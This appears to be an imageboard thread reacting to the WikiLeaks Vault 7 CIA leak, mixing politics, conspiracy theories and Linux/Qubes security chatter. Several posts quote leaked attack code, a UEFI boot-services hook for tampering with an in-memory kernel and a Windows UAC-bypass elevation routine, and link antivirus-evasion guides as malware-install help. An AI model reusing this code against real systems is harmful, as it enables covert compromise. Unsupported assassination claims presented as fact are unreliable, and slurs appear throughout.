Trump has plenty of responsibility, which is why I expect him to side with his friends inside the CIA. They're his henchmen (ie the people he will later use to wiretap the DNC and others) and he needs them on board. Obviously this isn't a good thing, but it's what will most likely shake out.

That's a laughable assertion.

CIA trips on /mlp/ and ponychan as Avedon!Void.EuI.c

ponychan.net/rp/res/41215539 50.html#41484893

I hope they respond to me! ʘ‿ʘ

What has wikileaks done to jeopardize their sources, or their treatment of material recieved from their sources? This conclusion makes. no sense. Assange won't and should not turn himself over to the U.S, and he has not damaged his reputation with its soures or of the authenticity of its leaks.

Both Holla Forums and t_ d have this idea that their champion is going to smash the CIA, and not defend them. It's going to be funny when they all have to pivot towards that in a few hours (whenever Trump gets around to tweeting about it).

What pisses me off is that most liberals will also defend the CIA over it because they seriously think they are fighting Trump "from the inside" or some shit.

Yeah but with liberals it's the expected position since they're all bootlickers for the dominant social order. Trumpens are a special level of dissonance, believing they're actually rebels and anti-establishment while vigorously cleaning the soles of every wanna-be authoritarian and state representative they see.

Bitch I'm in I2P.

Also this really clonkers my bonkers.
The NSA has free range over all Earth dwelling humans for passive recording of everything we do, touch, say, think, download, look at, read, hear, close and open. how long we do those thing, and who or what with. The ONLY thing the NSA has any red tape about it TAO, and even then it's a rubber stamp yes-men "court."
Somehow the CIA found this to be absolutely harram and created it's own internal TAO without any rubber stamp court.
Holy shit everything is shaking apart because Hillary didn't get her turn and it is so fucking INTERESTING to watch! We are currently in the best timeline. I will kiss the ground of whatever beautiful person leaked this shit to the press. Of course, they're only doing it to shake shit up because the deep state did not get what it wants, but still.

The underlying liberal axiom, and one Holla Forums subscribes to as well in a somewhat twisted way, is that the operation of the intelligence agencies and government bureaucracy is inherently patriotic and pure. It is merely a "tool", or something allegory to an animal, which posesses no ideology or political will or its own. Within the mainstream press, this is an assumption that is almost unconscious.

Not CIA, but they probably got the picture from the same source. Google images or some shit.

He made a promise for the sake of protecting his source.

Only file with that exact name online previous to this date I can find is that image being used on /mlp/. The image itself exists elsewhere, but not under the name Sassy-Cat-Pic-640x607.jpg

screen-shot the cat and upload it to Google image search, they're pretty good with resizes these days.

Don't be obtuse. That resulted in his source being freed– but let me ask you something, what do you think makes an anonymous source trust wikileaks? Do you think they have to trust Assange won't turn himself over to the U.S. government, thus exposing himself to torture and interrogation, and compromising the anonyminity of all of his sources?

Holy fuck!

Oh my god, the poor bastards at the CIA. Hahahahahah.

That will get you usages of the image itself on the internet, not of the image under that specific name. The file itself is within the CIA's meme folder contained in the leak.

Its just proof that russia thinks they will profit from the leaks, but liberals cant understand that maybee sometimes russias interests overlap with their own

HACKING UEFI BOOT PROCESS:

add a hook during the UEFI boot process and access the OS's kernel which is left in unprotected memory right before calling ExitBootServices during UEFI startup.

wikileaks.org/ciav7p1/cms/page_36896783.html

extern EFI_BOOT_SERVICES *gBS;EFI_EXIT_BOOT_SERVICES gOrigExitBootServices;EFI_STATUSEFIAPIExitBootServicesHook(IN EFI_HANDLE ImageHandle, IN UINTN MapKey){ /* */ /* Do fun hook-related stuff here */ /* */ /* Fix the pointer in the boot services table */ /* If you don't do this, sometimes your hook method will be called repeatedly, which you don't want */ gBS->ExitBootServices = gOrigExitBootServices; /* Get the memory map */ UINTN MemoryMapSize; EFI_MEMORY_DESCRIPTOR *MemoryMap; UINTN LocalMapKey; UINTN DescriptorSize; UINT32 DescriptorVersion; MemoryMap = NULL; MemoryMapSize = 0; do { Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion); if (Status == EFI_BUFFER_TOO_SMALL){ MemoryMap = AllocatePool(MemoryMapSize + 1); Status = gBS->GetMemoryMap(&MemoryMapSize, MemoryMap, &LocalMapKey, &DescriptorSize,&DescriptorVersion); } else { /* Status is likely success - let the while() statement check success */ } DbgPrint(L"This time through the memory map loop, status = %r\n",Status); } while (Status != EFI_SUCCESS); return gOrigExitBootServices(ImageHandle,LocalMapKey);}EFI_STATUSEFIAPIHookDriverMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable){ /* Store off the original pointer and replace it with your own */ gOrigExitBootServices = gBS->ExitBootServices; gBS->ExitBootServices = ExitBootServicesHook; /* It's hooked! Return EFI_SUCCESS so your driver stays in memory */ return EFI_SUCCESS;}

Are you really surprised? It was even more obvious during the election.

Signal is not AV. You are misunderstanding what Signal and things like it do.
So, Signal runs inside a compromised device, (android phone) on a hostile network (internet) which encrypts it's messages so they are not able to read as the pass through the network.
Now, all this means is that NSA and CIA passive surveillance can't see peoples messages as they go over the network. If one of the agencies wants to just look at one phones messages, and they can identify that one phone, then they just have to remotely activate it's surveillance software that was in it when you bought it. Once they have done that they can just watch your screen like it's a TV show as you type your message, before it's even encrypted and sent out of the phone in the first place. Signal or things like it are not compromised, they devices you run them on are, and that's how they get around Signal.
That said, every fucking person on the planet should use Signal.

Wrong. You are misunderstanding it.
Someone knowing a hole in the security of an otherwise secure software is not the same thing as software being broken into as a feature when you buy it.

You want some code to alter a kernel while still in memory right before exiting the UEFI boot-up?
see:

Heres instructions of setting up the UEFI build environment, if interested:
>wikileaks.org/ciav7p1/cms/page_27262984.html

this page is bout to be YUUUUUGE
>wikileaks.org/ciav7p1/cms/page_11628873.html

I'm not much of a computer whiz, but does this essentially enable you to steal whatever information you want from a kernel running UEFI?

it is instructions on how to create a 'hook' which is inserted during the UEFI boot process. these 'hooks' can essentially do anything you want. what is proposed as the likely use for it is modifiying a kernel when it is in memory, before the memory becomes protected by actually executing instructions from the kernel.

basically, it shows a weak spot between UEFI boot-up process and actual OS boot up and it shows how to exploit this weakness with any arbitrart code you want by simply placing it in the top of that function where it says

/* */ /* Do fun hook-related stuff here */ /* */ /* Fix the pointer in the boot services table */ /* If you don't do this, sometimes your hook method will be called repeatedly, which you don't want */

if you read the wikileaks document its fairly descriptive in concept and execution

It would be more accurate to say that this allows you to modify a kernel while in memory before the kernel is loaded, thus allowing for just about anything you want.

Whats big about this is you cant tell your kernel has been modified by examing the file, you would have to examine the kernel in memory to even be able to tell youve been infected

That's crazy, so Wikileaks has actually revealed new hacking strategies that can be applied by code kiddies anywhere? That's fucking hardcore.

Well, they are meaningless now.

this is easiest the most significant leak ever. I saw code in there to elevate muh privileges in Windows 7…

Document stated something along the lines of:

This not only suggests that this """Feature""" has been built into Windows 7, by Microsoft, for the CIA, but this section also includes the snipped of code which makes this happen.

Heres sauce:
wikileaks.org/ciav7p1/cms/page_3375231.html

//UAC Bypass Object
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv){ BIND_OPTS3 bo; WCHAR wszCLSID[50]; WCHAR wszMon[300]; StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0])); HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID); if (FAILED(hr)) return hr; memset(&bo, 0, sizeof(bo)); bo.cbStruct = sizeof(bo); bo.hwnd = hwnd; bo.dwClassContext = CLSCTX_LOCAL_SERVER; return CoGetObject(wszMon, &bo, riid, ppv);} void ElevatedDelete(){ MessageBox(NULL, "DELETING", "TESTING", MB_OK); // This is only availabe on Vista and higher HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); IFileOperation *pfo; hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo)); pfo->SetOperationFlags(FOF_NO_UI); IShellItem *item = NULL; hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item)); pfo->DeleteItem(item, NULL); pfo->PerformOperations(); item->Release(); pfo->Release(); CoUninitialize();}

Why does C always look like dog shit, - _ - *.

It does take some getting used to…
Honestly, this isnt the hardest of the C to read, but I know what you mean

Because it was created like 30 years ago or something, back when people were used to LISP and Fortran

Why are they meaningless now? Has this shit suddenly been patched or something? What's stopping non-CIA people from using this shit for their own purposes?

I'll tolerate Debian but fuck Gentoo.

I've always liked the C syntax.

I mean it's valid but it's probably gonna be patched soon.

Debian is great though. By far my favorite distro.

C looks exactly the way you want it to look.

(´;ω;`)ロリコンのくまじゃないよ!!

Is it just me or is the internet eerily silent on this… like pol and reddit are quieter than they should be

There's no drama yet to really energize them. No one's been fired, no one's been arrested, no one's dirty laundry has been aired.

But this is only part one

Littrrly every main sub on reddit is comprised by shills or mods who are shills.

there is a wikileaks subreddit

reddit.com/r/WikiLeaks/

Wouldn't be surprised if the CIA is trying to slide discussion as much as possible to limit the impact.

Reddit is compromised. see

I was on pol earlier and their mods were confining everything to one thread so it's not as hectic as it usually would be.

Twitter is blowing up as far as I can tell, it reached number 1 trending earlier but dropped to 4th but Twitter officially just put a moment together documenting the events so it should spike back up.

Snowden on WikiLeaks Year Zero: Evidence US govt pays to keep 'software unsafe'
rt.com/viral/379769-snowden-responds-wikileaks-dump/

Apple, Samsung, Microsoft: WikiLeaks blows lid on scale of CIA’s hacking arsenal
rt.com/news/379757-your-whole-life-is-hacked/
Smartphone devices

The CIA's Mobile Devices Branch (MDB) developed a variety of tools and techniques to remotely hack and control the world’s most popular smartphones and tablets.

Once hacked, phones can be used to transmit their “geolocation, audio and text communications” directly to the CIA without the user’s knowledge. In addition, the CIA can remotely activate the phone’s microphone and camera.

Apple devices

Despite Apple holding a minority share in the global smartphone market in 2016, the CIA’s Mobile Development Branch has a specific division dedicated to the hacking of Apple devices which run the iOS operating system from smartphones and tablets.

WikiLeaks also alleges that the CIA not only developed but collaborated on or purchased a variety of hacking tools or ‘zero days’ from intelligence agencies and contractors around the world such as GCHQ, NSA, FBI or Baitshop.

Samsung

The EDG has produced a ‘zero day’ capable of hacking Samsung smart TVs, switching it into a fake ‘off mode’ where the device appears to remain on standby while actually recording audio and transmitting it to nearby secured CIA servers.

For context, Samsung was the top-selling television brand in the world for the last decade with a global market share of 21 percent as of 2015. WikiLeaks did not specify in the initial release whether video recordings were also a part of this particular ‘zero day.’

Vehicle control

As far back as 2014, WikiLeaks alleges that the CIA was exploring the possibility of infecting control systems in modern cars and trucks. While the exact goal of such control has yet to be established, WikiLeaks suggests that such hacks could be used for almost undetectable assassinations.

Android devices (Samsung, HTC, Sony)

The majority of the world’s smartphones (approximately 85 percent) run on the Android operating system, with roughly 1.15 billion Android devices sold last year, according to the WikiLeaks statement. Naturally, the CIA devoted an entire subdivision to hacking Android devices, with 24 individual weaponized ‘zero days’ targeting Android devices.

Microsoft

The CIA’s cyber division has developed numerous local and remote ‘zero days’ to hack and control Microsoft Windows users.

These ‘zero days’ include, but are not limited to: air gap jumping viruses such as ‘Hammer Drill’ that are capable of infecting computers or phones that have never been connected to the internet; hacking tools that focus on removable devices such as USB drives; systems for hiding data, be it in covert disk areas or in images; particular ‘zero days’ that are manufactured to self-perpetuate and hide themselves from detection on an ongoing basis.

Before any tech experts gloat, WikiLeaks also alleges that the CIA has developed advanced, multi-platform malware attack and control systems that cover Windows and Mac OS X but also mixed source platforms like Solaris and open source platforms like Linux. Wikileaks names these specific ‘zero days’ as the EDB's ‘HIVE,’ ‘Cutthroat’ and ‘Swindle’ tools.

Michael Hastings
Michael Hastings
Micheal Hastings
Michael Hastings
HIS NAME WAS MICHAEL HASTINGS

Any other mysterious vehicular deaths recently? We should be compiling this shit.

.BBBBB……..U….U……MMMMMMM……PPPPP
..B…….B…….U….U……M…..M……M……P……P
..BBBBBB…….U….U……M…..M……M……PPPPP
…B……..B……..U….U……M…..M……M……P
….BBBBB……….UUU…….M…..M……M……P

whats strange is the man who died was a journalist, and claimed that the NSA was following him shortly before he died

from wikipedia:

en.wikipedia.org/wiki/Malaysia_Airlines_Flight_370

I'm familiar with Hastings, I'm just asking if any of the other "political assassination" theories can be linked to vehicular deaths.

plenty of airliners have myseriously 'disappeared'

So where does Kasey Anthony play into this

But there wasn't anyone of note on that flight as far as I can remember.

Any deaths involving electronic malfunctions or vehicular suicide are worth looking into.

The CIA has a footlong deep in everything
What do we do?

Basel Al-Assad?

kek

Wait until all this shit is over, no point in taking up arms because we have no allies. We have to just wait until all these idpol idiots get despooked and then we might be able to progress revolutionary.

But we have no chance in a battle between the Deep State and State Classic

CIA WIKILEAKS VAULT 7.zip 1.8 GB

archive.org/details/CIAWIKILEAKSVAULT7

I've thought for a while he was killed that way and knowing that the faction of the military he went against was very pro-clinton and the CIA has been unabashedly on her side the past few months it gets easier and easier to believe.

thanks mans

Not remotely surprised that the alphabet soup has shit taste.

twitter.com/wikileaks/status/839231634410983424
dankest trojans
We power hunger idiots in cia land but at least they like da maymays

Fuck you. I am so sick of right winger contorting history to fit their whims

Be nice to plebs.
t. Gracchi Brothers

RIP M. Hastings.

May the truth finally be known

we got the dankes guillotines

Eh

these people deserve to have all their information made public

Ever wonder how to bypass antivirus software and install your malware on a target PC???

look no further
wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Heres another CIA level document on circumventing antivirus software.

wikileaks.org/ciav7p1/cms/files/2014_EN_BreakingAVSoftware_JoxeanKoret.pdf

All of these antivirus softwares have articles on how to bypass, wikileaks has yet to publish said articles. Hopes it will come soon.

ClamAV SECRET
Articles On Bypassing PSPs
Norton SECRET
Kaspersky SECRET
Avira SECRET
Zone Alarm SECRET
Rising SECRET
Articles on Exploiting PSPs
PSP Process Names from DART
F-Secure SECRET
Zemana Antilogger empty
EMET (Enhanced Mitigation Experience Toolkit) SECRET
Malwarebytes Anti-Malware SECRET
Bitdefender SECRET
Panda Security SECRET
Trend Micro SECRET
ESET SECRET
Avast
AVG SECRET
Symantec SECRET
McAfee SECRET
Comodo SECRET
Microsoft Security Essentials SECRET
GDATA SECRET

Can't expect much from some fuckers still using memegenerator.

Windows - Lock and Unlock System Volume Information

wikileaks.org/ciav7p1/cms/page_13763164.html

This leak is way better than I was expecting.

twitter.com/wikileaks/status/839154582970335232

Cant wait until this is published:

Windows - Hook Functions by Replacing References

wikileaks.org/ciav7p1/cms/page_16385276.html

Module Description: Replaces all references to the target function with the specified hook function address

lainchan is probably having a field day

Always funny seeing Trumpfags supporting leftist people. I wonder how many of them will attack Wikileaks if they post anything compromising Trump in a few years.

It's kinda fucking dead nowadays.

Windows - muh privilege Escalation Modules

Sub-Pages:

STALLMAN IS A RUSSIAN AGENT

Ho Hum.

The thread was locked because current Lainchan is shit.

Sauce on original pic, context?

i just skimmed through a few boards and didn't see a single thread about the links, even on the cyber-security board. not even gonna bother lurking in the irc.
depressing.

Gotta say user…
if your not using Qubes OS your not using the master computing race.

I can only hope this is nothing.

It's the second thread on /sec/. Mod locked it claiming it went off topic for the board. Mods are shit.

Its not nothing

for starters, see:

or even:

wew

It barely had any discussion before some CIA nigger thought it should be locked.

Turned into shit after it was sold. Thanks capitalism!

CIA viruses use systemd.
Lennart Poettering has killed us all.

What should I be using then? Always been good for what I need, but I admit I still have a lot to learn. Is a good suggestion.

i fuck knew it!

I'll admit, I'm using Debian too, but I swear I'll eventually move to a different distro (like Arch without systemd or Gentoo) eventually.

Read this and consider if you care about using a distro with systemd:
without-systemd.org/wiki/index.php/Arguments_against_systemd

There's no evidence yet but with how convoluted it is it's almost certain it has backdoors.

ill give you a quick rundown on Qubes

Type I Hypervisor (Xen)
Your desktop (based off of Red Hat running XFCE) operates without an internet connection, it does not communicate with any other machine, ever. it is 100% isolated.

This hypervisor virtualizes everything you do in seperate virutal machines.

every time a virtual machine is closed it gets scrubbed. I can download and install a virus, and after restarting the VM its gone.

Only way to infect the entire machine is to connect your dom0 to the internet (which there is NEVER any reason to do) and then install malware.

Granted this wont protect against this:

it makes persistance a bitch, like from malware like this:

You can't use Arch without systemd.

You know it didn't use systemd until "recently", right?
Also, systemd-free.org/

Use Qubes OS

Sauce please?

Those CIA niggers. Terry Davis was right.

If you have patience and are knowledgeable about GNU/Linux, just install gentoo.

You do realise the words Orwell used in 1984 were making fun of YOU right?

apparently valve is modeled off of anachro-syndicalism

I wonder how many cuckchan Holla Forums "doxes" were just some bored CIA guys shooting the shit.

They do say they have no "bosses" and they all work on the same level and on whatever they want to but I wonder how much of that is complete bullshit.

It's true for the engineers working there, but I don't know about the people doing customer support or whatever.

If by recently you mean since 3 to 4 years ago then yeah.
A lot of shit and I mean A LOT of shit on arch have systemd as a dependency if you don't want systemd you will be better just using a distro that doesn't rely on it.

may god besse his soul

I'm 80% sure Steam Support is actually from outside Valve.

Just watched a video on it and I'm pretty much sold. Beyond the security it seems like a comfy way to organize my activities between VMs.

lainchan.org/sec/res/4091.html#4637

LAINCHAN IS COMPROMISED

Here's to hoping Comrades from outer space will come and deliver us from this mess

Will I be able to play vidya decently on a VM?
That's literally the only reason I am still using windows.

have two different fucking PCs
Seriously. Get a thinkpad or some shitty laptop, uninstall whatever shit came on there, install tails, use tor, do some other basic netsec and infosec shit and keep your Windows PC as a gaming machine

This. It's pretty much what I do. I have a desktop that I play games on and I have my laptop that I do most everything else on. Would be cool if I could do high end gaming in a secure manner, but Windows 7 with some common sense opsec is the best I can do without sacrificing my hobbies. Will give up on Windows in general when Windows 7 stops being supported.

sorry for late response, was doing uni homework.

Yes, videos work fine on Qubes. you cant even tell your using virtual machines, its seamless

also, you can virtualize windows if you want to play windows games

qubes-os.org/doc/windows-appvms/

And there are people in this thread using Qubes OS… its the computing master race
qubes-os.org/

yeah, i'm able to run most windows games on steam through wine. some are more tricky than others to get to work due to certain packages needed and whatnot and stuff like directx but most of it's pretty easy to get to work.

i kind of dislike wine…
But on the topic of Qubes OS, you can install windows into a domain and have a full fledged windows machine running on the OS… that way you dont have to wine anything…

Since Qubes is a type I hypervisor, you may as well virtualize windows (if you have the extra mem that is) rather than using wine

Android Exploits And Techniques

Sub-Pages:

Cobalt
BaronSamedi
Flameskimmer (FS2) Porting
Chronos
Remote Code Execution (RCE) Exploits - Helios

This shit must be good, the exploits are redacted.

hoping they are released soon

Android Exploits And Techniques

Name: EggsMayhem
Contractor: GCHQ, NSA
Affected Devices: Chrome version 32 - 39
Type: Remote Access

i would be laughing if i weren't terrified

In case your curious and want to know how to use some CIA command and control software…

SECRET//NOFORN (U) Hive 2.6.2 User's Guide
wikileaks.org/ciav7p1/cms/files/UsersGuide.pdf

It's pretty clear that instanced virtualization is the only hope for security these days.

youtube.com/watch?v=QQcrSPiNnNg

Which is funny, because all the capitalist point to that book like it warns of the dangers of socialism.

CIA WIKILEAKS VAULT 7.zip 1.8 GB

drive.google.com/file/d/0BxRMPlDydM_kXzA5Nl9pRDZ6XzA/view?usp=sharing

Not even virtualization will protect you from their malware which can affect the computers in cars, causing them to hit brick walls at 90 mph (Michael Hastings)

apparantly the only soultion to the US's cyber surveillance is to adopt an Amish lifestyle

underrated

Why the fuck would I buy a car with that kind of invasive computer control?

basically any vehicle manufactured in the last 10-15 years is computer-controlled

Guess I'm getting a motorcycle then.

also, nice digits

It's about authority, not socialism.

Not as safe, but you'll be saving a lot of money that way. Been thinking about it myself.

I tend to agree with this. Socialism (or more accurately, it was communism) was just used as a way to present authoritarianism in 1984

im buying one of these bad boys

Then I will just have to learn how to maintain my current junker into perpetuity.

wish I could say the same… had a '93 Ranger pickup that I kept in amazing shape… until some company worker in a ford f-650 fell asleep on the freeway and broadsided me… pushed me over a guard rail and rolled my truck, totaled it.

I actually decided just to use bicycles after that. I dont ever travel far anyways

NO

there is good evidence Microsoft does but there is no present evidence that Apple has backdoors. This leak also does not show that Signal communications are compromised either.

good luck sucking apple's dick shill

I hope there's actual evidence of systemd being compromised so my lazy ass decides to move to another distro.

You nitwit. There ARE more secure ways of communication than others and as of now Apple is not complicit and that should be noted.

Runit is a dank init system, think about Void Linux sometime.

seems about right, read:

>wikileaks.org/ciav7p1/cms/page_3375231.html

it says something along the lines of windows 7 having a feature where commands can be executed at administrator level without the UAC confirmation window. it then goes on to show the code to enact this feature

qubes.

Qubes OS is the master computing race. I just made the switch about a month ago. Theres a learning curve, no doubt, even for long time linux users. but its worth it.

discussion:

Yes, this is good to note.
Also, Google does not seem to be complicit, but this is unverified.

Windows on the otherhand seems to enjoy sucking CIA cock and getting the throatpie

Can you still host a file server or home webserver relatively conveniently on Qubes/Xen?

Just a couple months ago I remember reading about a pedophile in my local paper getting caught because gmail has some sort of email scraper that detected his content and then reported it to the FBI. Google doesn't give a shit about privacy and you can bet they comply with this crap.

Absolutely.
Dont expect to get it going immediatly though, im a longtime linux user and it took about a week for me to adjust to it.

You can definately do hosting on it, just read about data persistence with qubes, if you dont know what your doing then every time you make changes to your server it will be reverted on next boot-up.

Just understand it first, and you can do at home file hosting/server no prob.

Ya, like I said unverified. I havent seen anything in the leaks that suggest they are compliant, but I wouldnt put it past them to be behind Microsoft in line for the CIA train

I actually run an at-home database server on arch linux im about to migrate over to qubes for the security aspect, so I understand your concerns

Wasn't Wikileaks the group that never redacts shit? Why are they doing it this time? Is Julian dead?

He's alive. I think he may have some interest in sucking up to Trump to get out of his current predicament or some shit because he apparently held back on releasing leaks related to him. Glad we're still getting good leaks, but I'm very annoyed with how they're going about things now.

Got any evidence for that claim?

Brian Donohue. CEO of Instapaper. also apparently is a brony and worked for the CIA

They're reporting on it because they have a demanding audience of slighly more bright sheep, not because they're somehow virtuous.
Trust no one

I remember an article where he praised Lukashenko lol.

I've seen this too, "The CIA is on our side now because kek magic" and so on.
Although the radical left suffers from the opposite axiom of "everything the capitalist states do is to fuck proles over" which while not accurate is a much safer assumption (one which Libertarians and tin-foil rightists took from us as well)
I want to see what Holla Forums has to say.

holy fuck.

Nah, it's the FBI Holla Forums believe are on their side. Legit retardation.

Gib me QubeOS 101/manual/toytorial

Tachanka Mk2

t. petit-burgy

CIA WIKILEAKS VAULT 7 IMAGE FILES .pdf and .docx

archive.org/details/CIAWIKILEAKSVAULT7IMAGEFILES

VAULT 7 CIA HACKING TOOLS DOCUMENTS Downloads

archive.org/details/VAULT7CIAHACKINGTOOLSDOCUMENTS

vault 7: 'america is a shithole they blames its problems on other countrys - putin was telling the truth the whole time and cia lies to the world to make america look like the hero when they were the devil the whole time'

very good

but most people known this the whole time - now we have proof

Reminder that this leak was LESS than 1% of Vault7:
twitter.com/wikileaks/status/839475557721116672

In other news of the I-had-to-learn-from-a-fucking-comedy-show-again-because-the-rest-of-media-won't-talk-about-it kind, Pablo Escobar's son recently released a book revealing that his father was a CIA employee.

globalresearch.ca/pablo-escobars-son-reveals-his-dad-worked-for-the-cia-selling-cocaine-media-silent/5576222

Thanks for the invasive hippos in South America, you fucks.

Bump

Should've done this when the thread had just reached post limit.

Why not Tox?

Or just get a vol to make this thread cyclical. This is going to be a long set of leaks.

Personally not a fan of cyclical threads. Having separate threads makes things tidier than deleting the oldest post every time a new one is made.

Instead, he decided to invade Cuba and ramp up Vietnam.

I am so jealous tbh